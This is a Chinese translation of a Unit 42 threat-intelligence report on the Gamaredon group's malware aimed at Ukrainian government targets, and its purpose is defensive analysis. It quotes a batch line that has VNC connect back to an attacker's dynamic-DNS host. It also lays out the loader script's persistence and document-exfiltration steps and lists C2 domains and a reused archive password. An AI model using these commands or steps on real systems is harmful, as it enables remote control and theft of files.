解密:Gamaredon黑客组织的工具进化与分析

标签:黑客NetworksPaloAlto

访客:16863  发表于:2017-03-13 10:02:03

解密:Gamaredon黑客组织的工具进化与分析

Palo Alto Networks 的威胁情报团队Unit 42最近观察到一个威胁组织正在分发最新定制开发的恶意软件。Unit 42将这个威胁组织定义为Gamaredon组织,研究表明Gamaredon组织自2013年以来就一直很活跃。

在过去,Gamaredon组织会大量使用现成的工具,不过最新的研究表明,Gamaredon组织已经转向定制开发的恶意软件,这一转变表明Gamaredon组织技术能力已经大幅提高。自定义开发的恶意软件功能非常全面,包括以下功能:

1.用于下载和执行其选择的附加有效负载的机制2.能够扫描特定文件类型的系统驱动器3.捕获屏幕截图的能力4.在用户的安全上下文中远程执行系统上的命令的能力

Gamaredon组织主要用于向受损域名,动态DNS提供商,俄罗斯和乌克兰的国家和地区顶级域名,俄罗斯托管服务提供商分发其定制的恶意软件。对于Gamaredon组织所开发的恶意软件,目前的各种安全防护软件很难检测到,Unit 42团队认为这可能是由于恶意软件的模块化性质导致的,由Gamaredon开发的恶意软件大量使用批处理脚本,善于利用合法的应用程序和工具(如wget)来进行恶意攻击。

Gamaredon的历史工具分析

Symantec和趋势科技最早发现了Gamaredon组织分发的攻击样本。不幸的是,这仅仅是其有效载荷的第一个变体,稍后的有效载荷变量的一些样本也只是它们定义为TROJ_RESETTER.BB和TROJ_FRAUDROP.EX而已。

最初,由Gamaredon发送到攻击目标的有效负载包括密码保护的自解压缩文件(.SFX),该文件在提取时会将一个批处理脚本写入磁盘并安装一个合法的远程管理工具,这种远程管理工具称为工具远程操作系统(Remote Manipulator System ),接着这个工具就会将被用于恶意目的。

解密:Gamaredon黑客组织的工具进化与分析

比如一个这样的自解压缩文件(ca87eb1a21c6d4ffd782b225b178ba65463f73de6f4c736eb135be5864f556dc)就是在2014年4月左右首次发现的。用来提取该文件的密码(由许多密码保护的SFX有效载荷会重复使用)是“1234567890__”,另外发现包含于SFX文件中的文件包括名为“123.cmd”的批处理文件和名为“setting.exe”的另一个SFX文件,其中名为“setting.exe”的SFX文件包含一个.MSI安装程序包,该程序包用来安装远程操作系统和处理安装的批处理脚本。

后来发现的一些文件的有效负载会将批处理脚本写入磁盘以及wget工具的二进制文件。批处理脚本将使用wget二进制文件下载和执行其他的可执行文件,批处理脚本还将使用wget向命令和控制(C2)服务器发送POST请求,这些服务器将包含有关受影响系统的信息,然后这些恶意文件在执行时会抛出诱饵文件。

这种类型的有效载荷攻击,可以从下面这三个示例种发现:

  1. a6a44ee854c846f31d15b0ca2d6001fb0bdddc85f17e2e56abb2fa9373e8cfe7 

  2. b5199a302f053e5e9cb7e82cc1e502b5edbf04699c2839acb514592f2eeabb13 

  3. 3ef3a06605b462ea31b821eb76b1ea0fdf664e17d010c1d5e57284632f339d4b 

Unit 42在2014年使用wget工具第一次发现了这些样本,当时这三个样本正伪装成乌克兰总统办公室,乌克兰国家安全,乌克兰国防,乌克兰反恐怖主义行动区以及乌克兰爱国主义的名义来抛出诱饵文件。如下图所示就是这样一个诱饵文件,

解密:Gamaredon黑客组织的工具进化与分析

其他发现的有效载荷将再次使用SFX文件来传递批处理脚本并允许通过VNC协议进行远程访问的可执行文件。这些VNC 可执行文件将包含在SFX文件中或通过批处理脚本下载。Unit 42找到了用来加载VNC可执行文件的一个URL: hxxp://prestigeclub.frantov.com[.]ua/press-center/press/chrome-xvnc-v5517.exe。

然后批处理脚本将尝试让VNC程序连接到命令和控制(C2)服务器,这样该服务器就能够控制受损系统。另外在受损系统上的所有VNC安装都会使用相同的配置文件,RC4加密文件和密码。

2015年1月前后,发现了cfb8216be1a50aa3d425072942ff70f92102d4f4b155ab2cf1e7059244b99d31样本,在这个样本中,使用的批处理脚本就确保了VNC连接可用:

  1. start winlogons -autoreconnect -id:%sP% -connect grom56.ddns.net:5500 

VNC配置文件中配置的路径是“Y:ПРОБАСозданиетрояновсозданиеRMS VNC”,但这不是Cyrillic文件路径的唯一位置。许多批处理脚本还会使用别的硬编码的路径,例如“ГлавноеменюПрограммыАвтозагрузка”。许多有效负载还会包括一个VBS脚本,VBS脚本会向用户显示一个对话框“应用程序无法初始化(0xc0000005),是否尝试再次打开该文件?这就是欺骗用户再次运行恶意软件。

某些SFX文件还包括另一个合法的应用程序ChkFlsh.exe(8c9d690e765c7656152ad980edd2200b81d2afceef882ed81287fe212249f845),经分析,这个应用程序是由乌克兰程序员编写的,用于检查USB闪存驱动器的性能,不过目前还没有搞清楚它对攻击者到底起到了一个什么样的帮助,但一种可能性就是它以某种方式用来窃取或监视USB设备上的文件。在Unit 42的研究中,研究人员发现这个应用程序存在于一些SFX文件,VNC程序以及一些没有包含VNC程序的SFX文件中。

对植入体进行自定义

虽然观察到的最近的样品仍然在使用批处理脚本和SFX文件,但这些数量已经越来越少了,Gamaredon组织已经不再利用像wget,远程控制工具,VNC和ChkFlsh.exe这样的应用程序了,即不再使用wget向攻击者分发自定义开发的下载程序,不再远程操作或利用VNC恶意软件进行远程植入。

在2015年6月,研究人员第一次发现了许多较新的使用自定义下载器的样本,这些样本通常包含在名为“LocalSMS.dll”的SFX植入体中,自定义下载器会向adobe.update-service[.]net(样本中的硬编码)发出请求(详细情况请看附录A)。

在2016年2月,另一个现在经常出现的自定义工具“Pteranodon”被发现包含在SFX植入体中。 “Pteranodon”这个SFX文件(3773ddd462b01f9272656f3150f2c3de19e77199cf5fac1f44287d11593614f9)包含一个新的木马(598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824),研究人员把这个木马称之为“Pteranodon”的一个自定义后门,通过该后门能够执行以下任务:

1.可以每隔一定的时间捕获屏幕截图并将其上传到攻击者的服务器2.下载和执行其他文件3.在系统上执行任意攻击命令

“Pteranodon”的最早版本是使用硬编码的URL来进行命令和控制。它使用static multipart boundary发送POST请求到“msrestore[.]ru/post.php”

————870978B0uNd4Ry_$

较新版本的工具还会使用hardcoded domain和multipart boundary,它们也会共享类似的pdb字符串。其他“Pteranodon”样本还可以在autofocus 属性中使用“Pteranodon”标签找到。 Pteranodon的最新变种在附录A中会有分析。

到目前为止,研究人员只确定了一个用于新植入体的传送载体—— JavaScript文件(f2355a66af99db5f856ebfcfeb2b9e67e5e83fff9b04cdc09ac0fabb4af556bd),该文件于2016年12月第一次从下载的http://samotsvety.com[.]ua/files/index.pht (大概是被有效载荷攻破的网站)中发现的,而此前的SFX文件(b2fb7d2977f42698ea92d1576fdd4da7ad7bb34f52a63e4066f158a4b1ffb875)就包含两个Gamaredon组织自定义的工具。

e24715900aa5c9de807b0c8f6ba8015683af26c42c66f94bee38e50a34e034c4就是其中的一个相关的样品,该样品使用了Mutex 样本所创建的互斥体,并包含一个一套分析工具,该工具的原始名称是“AdapterTroubleshooter.exe”,并使用类似于OpenVPN使用的图标,如下所示。

解密:Gamaredon黑客组织的工具进化与分析

在AutoFocus属性中检查样本的文件活动时,很明显可以发现,样本是一个自解压的可执行文件。

解密:Gamaredon黑客组织的工具进化与分析

使用7zip在虚拟机中打开该样本,可以检查所有包含的文件内容。下表详细列举了SFX文件的SHA256值,文件名,编译时间和pdb文件的生成路径。

解密:Gamaredon黑客组织的工具进化与分析

样本的引导逻辑依赖于“condirs.cmd”的内容。简单来说,“condirs.cmd”中的逻辑如下:

1.确保“%LOCALAPPDATA%MicrosoftWindows”存在

2.清除和删除可能干扰样品执行的进程、文件和计划任务

3.将“winrestore.dll”复制到“%LOCALAPPDATA%MicrosoftWindowsUsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5win}.dll”

4.将“OfficeUpdate.dll”复制到“%LOCALAPPDATA%MicrosoftWindowsUsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5off}.dll”

5.确定操作系统是Windows XP还是Windows 7

6.如果系统运行的是Windows XP

a.设置目录以将文件复制为“%WINDIR%SetupStateOffice”b.将“UsrClass.lnk”复制到“%USERPROFILE%Главное менюПрограммыАвтозагрузка”C.将“SmartArtGraphicsLog.lnk”复制到“%USERPROFILE%Главное менюПрограммыАвтозагрузка”

7.如果系统运行的是Windows7

a.设置目录以将文件复制为“%APPDATA%MicrosoftOffice”b.将“UsrClass.lnk”复制到“%APPDATA%MicrosoftWindowsStart MenuProgramsStartup”c.将“SmartArtGraphicsLog.lnk”复制到“%APPDATA%MicrosoftWindowsStart MenuProgramsStartup”

解密:Gamaredon黑客组织的工具进化与分析

8.将“winrestore.dll”复制到步骤6或7a中设置的目录,文件名为“MSO1234.win”

9.将“LocalSMS.dll”复制到步骤6或7a中设置的目录,文件名为“MSO1567.dls”

10.将“OfficeUpdate.dll”复制到步骤6或7a中设置的目录,文件名为“MSO5678.usb”

11.将“MpClients.dll”复制到步骤6或7a中设置的目录,文件名为“MSO8734.obn”

12.使用rundll32.exe在“MSO1234.win”中执行导出的函数“updater”

13.使用rundll32.exe在“MSO1567.dls”中执行导出的函数“EntryPoint”

应该注意,“UsrClass.lnk”链接到“%WINDIR%system32rundll32.exe UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5win}.dll,updater”,“SmartArtGraphicsLog.lnk”链接到“C:WINDOWSsystem32rundll32.exe UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5off}.dll,StartBackup ”。这些是“winrestore.dll”和“OfficeUpdate.dll”所在的位置,分别复制到步骤3和4。

然后“condirs.cmd”脚本继续:

1.计划以下任务:

a.任务名称“UpdatesWinRes”,调用“MSO1234.win,updater”b.任务名称“UpdatesWinDLL”,调用“MSO1567.dls,EntryPoint”C.任务名称“UpdatesWinUSBOOK”,调用“MSO5678.usb,StartBackup”d.任务名称“UpdatesWinOBN”,调用“MSO8734.obn,bitDefender”

2.确保目录“%Temp% reports ProfileSkype ”存在

3.中止 “skype.exe” 进程

4.将“%AppData% Skype”的内容复制到“%Temp% reports ProfileSkype ”

5.在“%Temp% reports %COMPUTERNAME ”下创建名称为Z W P S V Q N M L K I J F H E G和D的子目录。这些是驱动器号。

6.将所有包含扩展名“doc”,“docx”,“xls”,“xlsx”,“rtf”“odt”和“txt”的驱动器号的文件复制到“%TEMP% reports %COMPUTERNAME% %% d “其中%% d是驱动器盘符

7.将具有上述扩展名的所有文件从所有用户的“桌面”,“文档”和“下载”文件夹复制到“%TEMP% reports %COMPUTERNAME% Desktop ”,“%TEMP% reports % COMPUTERNAME% Documents “和”%TEMP% reports %COMPUTERNAME% Downloads “

解密:Gamaredon黑客组织的工具进化与分析

8.使用rundll32.exe在“MSO5678.usb”中执行导出的函数“StartBackup”

9.使用rundll32.exe在“MSO8734.obn”中执行导出的函数“bitDefender”

10.清理临时文件,并将进行自我删除和休眠

当这个脚本完成后,攻击者就会利用这些植入体来窃取文件,捕获截图同时赋予这些植入体逃避检测的能力。这些植入体会在附录A中详细分析。

植入体的变体过程

虽然用于控制受损系统的有效载荷在不断地变异,但是在所发现的样本中,它们都出现了许多共性。虽然并不是每个样本都并不像以上所描述的那样,但已知样本的散列都包含在附录中的“攻击指示器(indicators of compromise)”部分。下面是来自几个相关样本的一些有趣的行为:

1.许多批处理脚本都出现了一些常用英文的拼写错误。比如文件名“cmd”,另一个例子是,“domen”被用作批处理脚本中的变量名,但经过分析“domen”其实就是 “domain”。

2.几乎所有样本中的所有批处理脚本都用ping localhost作为睡眠方式

3.许多批处理脚本命名为“cmd”,其中一些包括字符串“Trons_ups”和“Treams”

4.许多批处理脚本都使用相同的命令来确定操作系统的版本

5.许多早期的样本都会使用如wget,UltraVNC和ChkFlash这样的应用程序,不过这些程序已早被最新样本中的自定义工具给替换了

6.采用VNC的样本都会使用相同的配置和密码

Monikers利用文件名,在脚本中导出和文件主题一致的的DLL函数,域和变量名,然后通过HTML 中autofocus属性中的SFX植入体,来识别类似的植入体。大多数样本以类似的方式传送,即被SFX植入体攻击过的资源,这些资源被分段并被加载批处理和VBS脚本。这些样本,在IPv4地址之间重复使用SSL证书以及在域名之间重复使用IPv4地址是显而易见的,如下图所示。

解密:Gamaredon黑客组织的工具进化与分析

下图就是一个最新的样本(在附录A中会详细分析),文件名以及SFX文件的重复使用非常显而易见。

解密:Gamaredon黑客组织的工具进化与分析

最新样本的发现

在VirusTotal(一个提供免费的可疑文件分析服务的网站)上所发现的植入体都是非常有限的,并且经常出现相互冲突的检测。从2014年以来,使用这些植入体的威胁组织就一直在活跃着,并且并且把攻击目标直指乌克兰政府。其中一些样本会同时共享传送机制和基础设施,这些样本后来被一些网络安全公司发现,并被认为是Gamaredon组织研发的。但是,目前最新的变体提供了更高级的恶意软件,不过还没有对其进行未命名。

Unit 42的研究人员会定期使用AutoFocus属性来搜索WildFire(执行动态分析以识别和阻止未知威胁)的各项安全检测报告,以期发现识别未识别出的最新样本及它们的攻击行为和活动。

Palo Alto Networks客户可以通过以下方式得知这些威胁:

1.WildFire已将此报告中描述的恶意软件标识为恶意软件

2. Traps检测( Palo Alto Networks 下一代安全平台的组成部份)会防止系统执行此报告中描述的恶意软件

3.这些样本所使用的C2域目前已被被阻止。

文章来源:黑客技术

评论(0)

您可以在评论框内@您的好友一起参与讨论!

<--script type="text/javascript">BAIDU_CLB_fillSlot("927898");